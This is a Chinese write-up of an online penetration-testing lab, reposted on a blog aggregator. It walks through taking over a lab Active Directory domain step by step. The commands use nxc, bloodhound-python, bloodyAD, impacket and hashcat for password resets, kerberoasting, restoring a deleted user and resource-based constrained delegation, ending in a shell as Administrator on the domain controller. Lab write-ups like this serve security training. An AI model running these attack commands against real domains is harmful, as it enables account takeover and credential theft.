惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Hugging Face - Blog
Hugging Face - Blog
GbyAI
GbyAI
Engineering at Meta
Engineering at Meta
有赞技术团队
有赞技术团队
博客园 - 【当耐特】
H
Hackread – Cybersecurity News, Data Breaches, AI and More
WordPress大学
WordPress大学
博客园_首页
美团技术团队
H
Help Net Security
MongoDB | Blog
MongoDB | Blog
宝玉的分享
宝玉的分享
大猫的无限游戏
大猫的无限游戏
小众软件
小众软件
J
Java Code Geeks
A
About on SuperTechFans
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
IT之家
IT之家
T
The Blog of Author Tim Ferriss
Microsoft Azure Blog
Microsoft Azure Blog
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
B
Blog
雷峰网
雷峰网
爱范儿
爱范儿

博客园_首页

Linux实操--组管理、权限管理和定时任务 Java + EasyExcel 实现单个接口导出多个Excel Mem0 源码解析系列(二):提示词工程的深度剖析 Openclaw TaskFlow究竟是什么?和普通Skill技能有什么区别 博文阅读密码验证 - 博客园 嘉立创开源:应该是全网MicroPython教程最多的开发板 Hermes Agent 集成实践:从协议到生产 2026年AI编程工具横评:Cursor、Codex、Claude Code、Zed、Windsurf Java程序员必看的RAG入门教程 2026 AI效率神器:Superpowers + Claude Code 保姆级教程 本地大模型部署全攻略:从 0 到 1 玩转 Ollama 【从0到1构建一个ClaudeAgent】内存管理-上下文压缩 .NET 高级开发 | 设计、实现一个事件总线框架 电子小白入门之NE555 3. WorkBuddy:隐藏玩法,一键召唤专家,让 AI 以"专家身份"给你干活 和AI一起搞事情#3:Claude Teammate 游戏开发翻车实录 【OpenClaw】通过 Nanobot 源码学习架构---(7)Memory C# .NET 周刊|2026年3月3期 我在 Debian 11 上把 K8s 单机搭起来了,过程没你想的那么顺(/opt 目录版) 深度学习进阶(七)Data-efficient Image Transformer CLI+Skill搭建浏览器AI自动化框架,告别一切重复枯燥任务 告别Token账单无底洞:OpenClaw本地部署,重塑企业数据主权的唯一解 FastAPI+Vue:文件分片上传+秒传+断点续传,这坑我帮你踩平了! SBTI 爆火后,我做了个程序员版的 CBTI。。已开源 + 附开发过程 多模态检索开始进入工程期:用 Sentence Transformers 搭建可落地的 Multimodal RAG 100多行代码实现一个最简单的Agent(用ReAct) Claude Code 通关手册(八):推荐 5 个 Hooks,代码质量提升 3 倍 老板:“有人截图了!”。安全部门:“收到,马上查暗水印!” - why技术 技术之外,皆是人间 C#/.NET/.NET Core技术前沿周刊 | 第 69 期(2026年4.01-4.12)
网络安全在线就能打的内网靶场推荐 & Dawn Breaker 单域...
公众号棉花糖fans · 2026-05-22 · via 博客园_首页

靶场链接:
无境的目标,是成为网安人必备的靶场,无境一直在持续上架靶场环境,涵盖了网络安全 技术方向的各个分类,在线内网靶场、web靶场、cve复现、SRC场景应有尽有。

https://bdziyi.com/ulab/lab.html?page=target-detail&id=152

Dawn Breaker

信息收集

SMB Welcome 可读

nxc smb 192.168.111.10 -u '' -p ' ' --shares

image-20260127155759208

读取 Letter.txt 文件

image-20260127155929312

image-20260127155946791

将这个信息作为用户名和密码进行尝试

nxc smb 192.168.111.10 -u 'Yangyang' -p 'Hello' --shares

image-20260127160035430

使用 bloodhound-python 进行信息收集

bloodhound-python -c All -u 'Yangyang' -p 'Hello' -ns 192.168.111.10 -d sec.lab -dc ad.sec.lab --zip --dns-tcp

image-20260127160552931

但是线路到了 LAHAYO@SEC.LAB 就断开了,接着再分析是否有路线到达域控或者域管理员,看到有一个未知的节点可以RBCD到域控

image-20260127160819071

第二条线路

image-20260127161005143

经过分析发现 Rover 这个账户很特殊,它关联着一个计算机账户,SOLARIS@SEC.LAB 可以重置它的密码,但是现在还没有 SOLARIS@SEC.LAB 相关的信息

image-20260127161127087

image-20260127161243989

在目前这个情况下想要获取到 SOLARIS@SEC.LAB 有两个方法可以尝试:

  1. Pre-Created Computer Account
  2. Timeroasting

获取 SOLARIS@SEC.LAB 的控制权

发现 SOLARIS@SEC.LAB 其实是 Pre-Created Computer Account,利用之前的域账户就能获取到其 Kerberos 凭据,另外 Pre-Created Computer Account 的密码与账户名全小写一样

image-20260127161805204

image-20260127162125299

重置 SOLARIS@SEC.LAB 自身密码

impacket-changepasswd -altuser 'SOLARIS$' -altpass 'solaris' -newpass '123456' -reset 'sec.lab/SOLARIS$'@ad.sec.lab -k -dc-ip 192.168.111.10

image-20260127143528970

获取 Rover 域用户的控制权

重置 Rover 的密码

bloodyAD -u 'Solaris$' -p '123456' -d sec.lab --host 192.168.111.10 set password Rover 123456

image-20260127162301651

验证账户不成功,根据报错来判断账户还没启用

image-20260127162417942

启用 Rover 账户

bloodyAD -u 'Solaris$' -p '123456' -d sec.lab --host 192.168.111.10 remove uac Rover -f ACCOUNTDISABLE

image-20260127162448345

Jinzhou 安全组

AddSelf

Rover 用户是可以将自身加入 Jinzhou@SEC.LAB

bloodyAD -u Rover -p 123456 --host 192.168.111.10 -d sec.lab add groupMember Jinzhou Rover

image-20260127162613183

image-20260127162715025

AddSPN

image-20260127162811490

根据ACL可以通过给图上四个用户添加 servicePrincipalName 来达到利用 kerberoasting 破解密码

bloodyAD -u 'Rover' -p '123456' -d sec.lab --host 192.168.111.10 set object Jinxi servicePrincipalName -v 'http/web'

image-20260127163010676

nxc ldap 192.168.111.10 -u 'Rover' -p '123456' --kerberoasting KERBEROASTING

image-20260127163036447

hashcat KERBEROASTING /usr/share/wordlists/rockyou.txt

image-20260127163120546

Black Shores 安全组

AddMember

image-20260127163215281

根据 JINXI@SEC.LAB 的ACL,将 Rover 加入 Black ShoresI@SEC.LAB

bloodyAD -u 'Jinxi' -p 'Jinxin' --host ad -d sec.lab add groupMember 'Black Shores' Rover

image-20260127163330106

WriteOwner

image-20260127163408351

根据ACL,Black ShoresI@SEC.LAB 对 TheShorekeeper 有 WriteOwner 权限

PS:TheShorekeeper 用户是禁用状态,可以使用 nxc 或者 查询 userAccountControl 属性来验证,这里就略过了

bloodyAD -u 'Rover' -p '123456' --host ad -d sec.lab set owner TheShorekeeper Rover

bloodyAD -u 'Rover' -p '123456' --host ad -d sec.lab add genericAll TheShorekeeper Rover

bloodyAD -u 'Rover' -p '123456' --host ad -d sec.lab set password TheShorekeeper 123456

bloodyAD -u 'Rover' -p '123456' -d sec.lab --host 192.168.111.10 remove uac TheShorekeeper -f ACCOUNTDISABLE

image-20260127163600093

Lahayo 安全组

AddMember

image-20260127163736789

bloodyAD -u 'TheShorekeeper' -p '123456' -d sec.lab --host 192.168.111.10 add groupMember Lahayo Rover

image-20260127163809083

接下来就回到上面信息收集部分分析的路径,到这里就断开了,注意

  1. 其实这个场景不止两条路径到达最后的域控
  2. 下图这个节点到底是什么?它可以 RBCD 到域控

image-20260127164142496

  1. 目前的路径无法获取下面的用户权限

image-20260127164057056

Active Directory - Recycle Bin

Active Directory 回收站 是 Windows Server 的一项功能,允许在不从备份还原的情况下,完整恢复误删的 AD 对象。


核心特性

  • 完整恢复:恢复对象的所有属性(如 SID、组权限、密码)。
  • 生命周期
    1. 已删除状态 (Deleted):对象移入回收站,保留所有属性。
    2. 已回收状态 (Recycled):超过“已删除对象生存期”后,属性被剥离,不可简单恢复。
  • 默认状态:Windows Server 2008 R2 引入,默认禁用,需手动开启且不可逆。

恢复方式

  1. 图形界面:通过 AD 管理中心 (ADAC) 的 "Deleted Objects" 容器。
  2. 命令行:使用 PowerShell 命令 Restore-ADObject

查询是否有用户对 "Deleted Objects" 有权限

bloodyAD -u Rover -p '123456' -d sec.lab --host 192.168.111.10 get writable

image-20260127164507287

还发现了一个删除状态的用户

image-20260127164537834

查询已删除用户的信息

bloodyAD -u Rover -p '123456' -d sec.lab --host 192.168.111.10 get search -c '1.2.840.113556.1.4.2064' --filter '(isDeleted=TRUE)' --attr name,objectSid

image-20260127164606961

Lynae 用户的 objectSid 刚好对于上了未知节点的SID

image-20260127164142496

恢复已删除用户

bloodyAD -u Rover -p '123456' -d sec.lab --host 192.168.111.10 set restore Lynae

image-20260127164640735

重置已删除用户的密码和启用用户

bloodyAD -u Rover -p '123456' -d sec.lab --host 192.168.111.10 set password Lynae '123456'

bloodyAD -u 'Rover' -p '123456' -d sec.lab --host 192.168.111.10 remove uac Lynae -f ACCOUNTDISABLE

image-20260127164731312

注意!!!

如果出现该报错,说明该用户对已删除对象不存在 LIST | READ 权限,WP 中先把 Rover 用户加入了 Lahayo 安全组,bloodhound 中没有实现对该 ACL 的分析,需要自己手动分析

image-20260127165012339

RBCD

bloodyAD -u 'Lynae' -p '123456' -d sec.lab --host 192.168.111.10 add computer Web 123456

bloodyAD -u 'Lynae' -p '123456' -d sec.lab --host 192.168.111.10 add rbcd 'AD$' 'Web$'

image-20260127165216752

impacket-getST -spn 'CIFS/AD' -impersonate 'Administrator' 'sec.lab/Web$:123456' -k -dc-ip 192.168.111.10

export KRB5CCNAME=Administrator@CIFS_AD@SEC.LAB.ccache

impacket-wmiexec -k -no-pass AD -dc-ip 192.168.111.10 -codec gbk

image-20260127165521643